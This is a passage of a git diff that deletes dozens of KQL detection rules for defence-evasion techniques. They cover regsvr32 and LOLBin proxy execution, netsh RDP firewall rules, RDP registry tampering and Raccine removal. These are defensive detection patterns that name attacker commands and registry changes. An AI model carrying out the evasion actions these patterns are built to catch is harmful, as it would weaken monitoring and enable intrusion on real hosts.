-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql b/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql
deleted file mode 100644
index fa762cf8..00000000
--- a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020/10/05
-// Level: low
-// Description: Attackers can use explorer.exe for evading defense mechanisms
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql b/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql
deleted file mode 100644
index ef5df7d2..00000000
--- a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql
deleted file mode 100644
index bf82b08d..00000000
--- a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub"
\ No newline at end of file
diff --git a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql b/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql
deleted file mode 100644
index 2654053b..00000000
--- a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/28
-// Level: medium
-// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
-// Tags: attack.defense_evasion, attack.t1216.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:"
\ No newline at end of file
diff --git a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql b/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql
deleted file mode 100644
index 68a7e400..00000000
--- a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Patrick St. John, OTR (Open Threat Research)
-// Date: 2020/05/03
-// Level: medium
-// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.
-// Tags: attack.defense_evasion, attack.t1027.002
-DeviceImageLoadEvents
-| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql
deleted file mode 100644
index 642d1a2c..00000000
--- a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sander Wiebing
-// Date: 2020/05/23
-// Level: high
-// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql b/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql
deleted file mode 100644
index 42662a16..00000000
--- a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/18
-// Level: high
-// Description: Detects Rclone config file being created
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath contains ".rdp"
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 85c02aac..00000000
--- a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019/01/29
-// Level: high
-// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed.kql
deleted file mode 100644
index 7dbac35c..00000000
--- a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/08/06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql
deleted file mode 100644
index a60a95e8..00000000
--- a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/09/29
-// Level: medium
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql b/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql
deleted file mode 100644
index faa83823..00000000
--- a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register"
\ No newline at end of file
diff --git a/Defense Evasion/Raccine_Uninstall.kql b/Defense Evasion/Raccine_Uninstall.kql
deleted file mode 100644
index 49b64825..00000000
--- a/Defense Evasion/Raccine_Uninstall.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/21
-// Level: high
-// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater")
\ No newline at end of file
diff --git a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql b/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql
deleted file mode 100644
index dd92ad7b..00000000
--- a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data"
\ No newline at end of file
diff --git a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql b/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql
deleted file mode 100644
index 0e6d6555..00000000
--- a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2024/04/25
-// Level: medium
-// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
-// Tags: attack.defense_evasion, attack.t1218.009
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Reg_Add_Suspicious_Paths.kql b/Defense Evasion/Reg_Add_Suspicious_Paths.kql
deleted file mode 100644
index 60b1ec1c..00000000
--- a/Defense Evasion/Reg_Add_Suspicious_Paths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: high
-// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Explorer_Policy_Modification.kql b/Defense Evasion/Registry_Explorer_Policy_Modification.kql
deleted file mode 100644
index 99eafa71..00000000
--- a/Defense Evasion/Registry_Explorer_Policy_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu")
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Hide_Function_from_User.kql b/Defense Evasion/Registry_Hide_Function_from_User.kql
deleted file mode 100644
index 3bb44e14..00000000
--- a/Defense Evasion/Registry_Hide_Function_from_User.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume"))
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql b/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql
deleted file mode 100644
index 9a184d08..00000000
--- a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Eli Salem, Sander Wiebing, oscd.community
-// Date: 2020/10/08
-// Level: low
-// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]"))
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql b/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql
deleted file mode 100644
index 2709a976..00000000
--- a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: high
-// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where (RegistryValueData =~ "Service" and (RegistryKey contains "\\Control\\SafeBoot\\Minimal" or RegistryKey contains "\\Control\\SafeBoot\\Network") and RegistryKey endswith "\\(Default)") and (not((InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)"))))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql
deleted file mode 100644
index d1cd996f..00000000
--- a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2021/11/29
-// Level: high
-// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql
deleted file mode 100644
index e8f1f303..00000000
--- a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/07/17
-// Level: medium
-// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
-// Tags: attack.defense_evasion, attack.t1574, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl")))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql
deleted file mode 100644
index 887d6512..00000000
--- a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/26
-// Level: high
-// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql
deleted file mode 100644
index 734cedc4..00000000
--- a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/26
-// Level: medium
-// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql b/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql
deleted file mode 100644
index 4b8796c3..00000000
--- a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: high
-// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme"
\ No newline at end of file
diff --git a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql b/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql
deleted file mode 100644
index 5e3e031a..00000000
--- a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities")))
\ No newline at end of file
diff --git a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql b/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql
deleted file mode 100644
index 86bc8bbe..00000000
--- a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
